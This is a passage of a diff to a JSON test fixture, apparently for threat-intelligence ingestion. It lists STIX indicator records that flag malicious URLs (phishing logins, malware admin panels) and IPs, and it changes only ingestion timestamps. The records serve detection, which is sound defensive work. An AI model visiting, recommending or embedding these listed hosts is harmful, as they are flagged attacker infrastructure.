http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:08:45.601Z\"}", "category": "threat", "type": "indicator", @@ -22227,7 +22227,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025345900Z", + "ingested": "2021-12-14T14:57:43.118383567Z", "original": "{\"created\":\"2020-02-20T04:09:16.891Z\",\"description\":\"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--6c201663-b1e4-483e-821b-0fe74aecc497\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:09:16.891Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:09:16.891Z\"}", "category": "threat", "type": "indicator", @@ -22279,7 +22279,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025350200Z", + "ingested": "2021-12-14T14:57:43.118383965Z", "original": "{\"created\":\"2020-02-20T04:11:00.455Z\",\"description\":\"TS ID: 55316616996; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--8203935f-fb3f-418c-945d-40fca5ef088d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T04:11:00.455Z\",\"name\":\"mal_url: http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:11:00.455Z\"}", "category": "threat", "type": "indicator", @@ -22330,7 +22330,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025354800Z", + "ingested": "2021-12-14T14:57:43.118384348Z", "original": "{\"created\":\"2020-02-20T04:28:36.154Z\",\"description\":\"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--238f73e8-938d-4d08-9705-b1b669c129b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-20T04:28:36.154Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.154Z\"}", "category": "threat", "type": "indicator", @@ -22382,7 +22382,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025358300Z", + "ingested": "2021-12-14T14:57:43.118384859Z", "original": "{\"created\":\"2020-02-20T04:28:36.172Z\",\"description\":\"TS ID: 55321824399; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--6ff21635-ac08-4afe-b5e7-c18dfe320f0f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:28:36.172Z\",\"name\":\"mal_url: http://23.247.102.18/4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.172Z\"}", "category": "threat", "type": "indicator", @@ -22434,7 +22434,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025363400Z", + "ingested": "2021-12-14T14:57:43.118385310Z", "original": "{\"created\":\"2020-02-20T04:28:36.19Z\",\"description\":\"TS ID: 55321824397; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--9f55ff73-b6b6-476d-bb32-b9a7f8b16e93\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:28:36.19Z\",\"name\":\"mal_url: http://23.247.102.18/6/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/6/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.19Z\"}", "category": "threat", "type": "indicator", @@ -22485,7 +22485,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025369500Z", + "ingested": "2021-12-14T14:57:43.118385757Z", "original": "{\"created\":\"2020-02-20T04:30:25.248Z\",\"description\":\"TS ID: 55321824409; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4abbf2ea-6e46-48e8-b74d-1928c92e6277\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-20T04:30:25.248Z\",\"name\":\"mal_url: http://f0400035.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0400035.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:30:25.248Z\"}", "category": "threat", "type": "indicator", @@ -22530,7 +22530,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025375900Z", + "ingested": "2021-12-14T14:57:43.118386248Z", "original": "{\"created\":\"2020-02-20T04:31:26.488Z\",\"description\":\"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-20T04:31:26.488Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.488Z\"}", "category": "threat", "type": "indicator", @@ -22582,7 +22582,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025383100Z", + "ingested": "2021-12-14T14:57:43.118386743Z", "original": "{\"created\":\"2020-02-20T04:31:26.532Z\",\"description\":\"TS ID: 55321824403; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--bfd713ad-3d94-441a-b6bc-135ce911b580\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:31:26.532Z\",\"name\":\"mal_url: http://23.247.102.18/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.532Z\"}", "category": "threat", "type": "indicator", @@ -22634,7 +22634,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025390500Z", + "ingested": "2021-12-14T14:57:43.118387132Z", "original": "{\"created\":\"2020-02-20T04:31:26.582Z\",\"description\":\"TS ID: 55321824401; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--f43a4d56-b27f-41f0-917b-52358df31e13\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:31:26.582Z\",\"name\":\"mal_url: http://23.247.102.18/2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.582Z\"}", "category": "threat", "type": "indicator", @@ -22679,7 +22679,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025397800Z", + "ingested": "2021-12-14T14:57:43.118387527Z", "original": "{\"created\":\"2020-02-20T04:32:16.603Z\",\"description\":\"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-41\"],\"modified\":\"2020-02-20T04:32:16.603Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:16.603Z\"}", "category": "threat", "type": "indicator", @@ -22724,7 +22724,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025405200Z", + "ingested": "2021-12-14T14:57:43.118388447Z", "original": "{\"created\":\"2020-02-20T04:32:52.041Z\",\"description\":\"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:32:52.041Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.041Z\"}", "category": "threat", "type": "indicator", @@ -22775,7 +22775,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025412400Z", + "ingested": "2021-12-14T14:57:43.118388928Z", "original": "{\"created\":\"2020-02-20T04:32:52.057Z\",\"description\":\"TS ID: 55321824423; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--fb1aa473-4d9d-46a3-b053-ae7c051d0e14\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T04:32:52.057Z\",\"name\":\"mal_url: http://lae9ac50.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lae9ac50.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.057Z\"}", "category": "threat", "type": "indicator", @@ -22826,7 +22826,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025419500Z", + "ingested": "2021-12-14T14:57:43.118389425Z", "original": "{\"created\":\"2020-02-20T04:32:52.074Z\",\"description\":\"TS ID: 55321824417; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--f4447d70-3217-4319-9b89-4439db608f67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-20T04:32:52.074Z\",\"name\":\"mal_url: http://ld01c555.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld01c555.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.074Z\"}", "category": "threat", "type": "indicator", @@ -22878,7 +22878,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025426600Z", + "ingested": "2021-12-14T14:57:43.118389859Z", "original": "{\"created\":\"2020-02-20T04:49:13.452Z\",\"description\":\"TS ID: 55324942456; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--93e03851-428e-4e25-9fa6-17383426a6d7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T04:49:13.452Z\",\"name\":\"mal_url: http://borrdrillling.com/psm91/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/psm91/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:49:13.452Z\"}", "category": "threat", "type": "indicator", @@ -22929,7 +22929,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025433900Z", + "ingested": "2021-12-14T14:57:43.118390379Z", "original": "{\"created\":\"2020-02-20T04:49:22.233Z\",\"description\":\"TS ID: 55324942451; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--ddce3ac3-2e92-4c94-9537-acefcbfecfc0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:49:22.233Z\",\"name\":\"mal_url: http://wtfshop.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wtfshop.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:49:22.233Z\"}", "category": "threat", "type": "indicator", @@ -22980,7 +22980,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025441Z", + "ingested": "2021-12-14T14:57:43.118390837Z", "original": "{\"created\":\"2020-02-20T04:50:21.678Z\",\"description\":\"TS ID: 55324942453; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d4e1621e-ff57-4881-bf03-67f89c1db651\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:50:21.678Z\",\"name\":\"mal_url: http://minecrafttusa1.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://minecrafttusa1.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.678Z\"}", "category": "threat", "type": "indicator", @@ -23025,7 +23025,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025448100Z", + "ingested": "2021-12-14T14:57:43.118391277Z", "original": "{\"created\":\"2020-02-20T04:50:21.708Z\",\"description\":\"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-20T04:50:21.708Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.708Z\"}", "category": "threat", "type": "indicator", @@ -23070,7 +23070,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025455200Z", + "ingested": "2021-12-14T14:57:43.118391717Z", "original": "{\"created\":\"2020-02-20T04:50:33.473Z\",\"description\":\"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-02-20T04:50:33.473Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:33.473Z\"}", "category": "threat", "type": "indicator", @@ -23121,7 +23121,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025459200Z", + "ingested": "2021-12-14T14:57:43.118392201Z", "original": "{\"created\":\"2020-02-20T04:51:08.292Z\",\"description\":\"TS ID: 55324942438; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e5ae9133-c459-4130-b2cc-6bfc3d1bba08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-20T04:51:08.292Z\",\"name\":\"mal_url: http://amazon-fr.fun/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://amazon-fr.fun/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:51:08.292Z\"}", "category": "threat", "type": "indicator", @@ -23172,7 +23172,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025464400Z", + "ingested": "2021-12-14T14:57:43.118392636Z", "original": "{\"created\":\"2020-02-20T05:16:07.933Z\",\"description\":\"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T05:16:07.933Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:07.933Z\"}", "category": "threat", "type": "indicator", @@ -23223,7 +23223,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025469900Z", + "ingested": "2021-12-14T14:57:43.118393027Z", "original": "{\"created\":\"2020-02-20T05:16:27.52Z\",\"description\":\"TS ID: 55330801573; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--a1d0cc69-641e-4588-92f4-0ad9713860e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-20T05:16:27.52Z\",\"name\":\"mal_url: http://f0400017.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0400017.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:27.52Z\"}", "category": "threat", "type": "indicator", @@ -23274,7 +23274,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025474900Z", + "ingested": "2021-12-14T14:57:43.118393523Z", "original": "{\"created\":\"2020-02-20T05:16:27.557Z\",\"description\":\"TS ID: 55330801572; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--52371067-94be-4a79-b45d-8de115e81e86\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-20T05:16:27.557Z\",\"name\":\"mal_url: http://f0391202.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391202.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:27.557Z\"}", "category": "threat", "type": "indicator", @@ -23325,7 +23325,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025478800Z", + "ingested": "2021-12-14T14:57:43.118393963Z", "original": "{\"created\":\"2020-02-20T05:16:37.354Z\",\"description\":\"TS ID: 55328307469; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--0e0682f9-a160-46c2-ba7f-ba9dc2858f7e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:16:37.354Z\",\"name\":\"mal_url: http://ld7fa9c9.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld7fa9c9.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:37.354Z\"}", "category": "threat", "type": "indicator", @@ -23370,7 +23370,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025483900Z", + "ingested": "2021-12-14T14:57:43.118394427Z", "original": "{\"created\":\"2020-02-20T05:16:41.613Z\",\"description\":\"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:16:41.613Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:41.613Z\"}", "category": "threat", "type": "indicator", @@ -23422,7 +23422,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025491300Z", + "ingested": "2021-12-14T14:57:43.118394877Z", "original": "{\"created\":\"2020-02-20T05:16:57.739Z\",\"description\":\"TS ID: 55328307494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--9f847df6-9c88-4a03-b852-394fd8a77f58\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T05:16:57.739Z\",\"name\":\"mal_url: http://referral-casino.club/1/stats/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://referral-casino.club/1/stats/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.739Z\"}", "category": "threat", "type": "indicator", @@ -23474,7 +23474,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025495600Z", + "ingested": "2021-12-14T14:57:43.118395410Z", "original": "{\"created\":\"2020-02-20T05:16:57.764Z\",\"description\":\"TS ID: 55328307481; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--479ea508-2ae1-4aea-825b-e83914fb8d53\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:16:57.764Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.764Z\"}", "category": "threat", "type": "indicator", @@ -23526,7 +23526,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025500200Z", + "ingested": "2021-12-14T14:57:43.118395895Z", "original": "{\"created\":\"2020-02-20T05:16:57.791Z\",\"description\":\"TS ID: 55328307476; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--051488db-6441-4ca9-9e5f-c8656e3b1d9f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-20T05:16:57.791Z\",\"name\":\"mal_url: http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.791Z\"}", "category": "threat", "type": "indicator", @@ -23571,7 +23571,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025503700Z", + "ingested": "2021-12-14T14:57:43.118396278Z", "original": "{\"created\":\"2020-02-20T05:17:10.129Z\",\"description\":\"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-20T05:17:10.129Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:17:10.129Z\"}", "category": "threat", "type": "indicator", @@ -23623,7 +23623,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025509Z", + "ingested": "2021-12-14T14:57:43.118396849Z", "original": "{\"created\":\"2020-02-20T05:18:20.205Z\",\"description\":\"TS ID: 55330801629; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--db19cb4e-25ad-46d3-a944-6e53f62d230c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-20T05:18:20.205Z\",\"name\":\"mal_url: http://liweff.eu/vla/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://liweff.eu/vla/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:20.205Z\"}", "category": "threat", "type": "indicator", @@ -23675,7 +23675,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025514700Z", + "ingested": "2021-12-14T14:57:43.118397332Z", "original": "{\"created\":\"2020-02-20T05:18:20.412Z\",\"description\":\"TS ID: 55328307485; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--438a519a-17ed-422b-a21d-0262b4b2fc0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:18:20.412Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:20.412Z\"}", "category": "threat", "type": "indicator", @@ -23727,7 +23727,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025521100Z", + "ingested": "2021-12-14T14:57:43.118397798Z", "original": "{\"created\":\"2020-02-20T05:18:22.703Z\",\"description\":\"TS ID: 55330801601; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7279d49d-39e4-42d1-8fb7-14ddb56d67d7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:18:22.703Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/pop/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/pop/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:22.703Z\"}", "category": "threat", "type": "indicator", @@ -23779,7 +23779,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025528400Z", + "ingested": "2021-12-14T14:57:43.118398194Z", "original": "{\"created\":\"2020-02-20T05:18:31.965Z\",\"description\":\"TS ID: 55328307489; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--70ae46d6-4f8c-4601-ac48-84848ca04719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:18:31.965Z\",\"name\":\"mal_url: http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:31.965Z\"}", "category": "threat", "type": "indicator", @@ -23831,7 +23831,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025535800Z", + "ingested": "2021-12-14T14:57:43.118398828Z", "original": "{\"created\":\"2020-02-20T05:18:31.986Z\",\"description\":\"TS ID: 55328307482; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--11637bfb-fd5b-482b-83b0-ab8a49aa80e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:18:31.986Z\",\"name\":\"mal_url: 